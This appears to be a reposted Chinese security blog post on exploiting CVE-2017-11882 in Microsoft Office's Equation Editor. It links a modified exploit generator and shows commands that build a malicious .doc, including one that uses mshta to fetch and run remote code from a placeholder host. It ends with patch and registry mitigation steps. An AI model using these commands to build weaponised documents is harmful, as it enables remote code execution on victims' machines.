CVE-2017-11882利用

2022年2月16日08:08:15评论80 views字数 1308阅读4分21秒阅读模式

From:https://evi1cg.me/archives/CVE_2017_11882_exp.html

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:http://www.freebuf.com/vuls/154462.html

今天在twitter上看到有人共享了一个POC，https://twitter.com/gossithedog/status/932694287480913920，http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/，后来又看到有人共享了一个项目https://github.com/embedi/CVE-2017-11882，简单看了一下这个项目，通过对rtf文件的修改来实现命令执行的目的，但是有个缺陷就是，这个项目使用的是使用webdav的方式来执行远程文件的，使用起来可能并不容易，所以就对此文件进行了简单的修改，具体项目地址如下：GITHUB：

https://github.com/Ridter/CVE-2017-11882/

使用方式很简单，如果要执行命令

1	`python Command_CVE-2017-11882.py` `-c` `"cmd.exe /c calc.exe"` `-o test.doc`

CVE-2017-11882利用

关于怎么进一步利用，可以参考之前写的https://evi1cg.me/archives/remote_exec.html，由于有长度的限制，这里可以采用mshta的方式来执行。构造的命令如下：

python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

最终效果如下：

CVE-2017-11882利用

解决方案：

1、微软已经对此漏洞做出了修复。

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补

(2)开启Windows Update功能，定期对系统进行自动更新

2、由于该公式编辑器已经17年未做更新，可能存在大量安全漏洞，建议在注册表中取消该模块的注册。

按下Win+R组合键，打开cmd.exe

对应office版本修改以下注册表路径以后，输入：

reg add "HKLMSOFTWAREMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000- 0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLMSOFTWAREWow6432NodeMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

本文始发于微信公众号（关注安全技术）：CVE-2017-11882利用

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2017-11882利用

【漏洞与预防】畅捷通文件上传漏洞预防

实战攻防 | 1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

几千个产品的默认账号密码

网络安全人士必知的MCP和A2A协议

第三方供应商遭勒索软件攻击，中国银行和星展银行11,200名客户受影响

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

发表评论

在线咨询

微信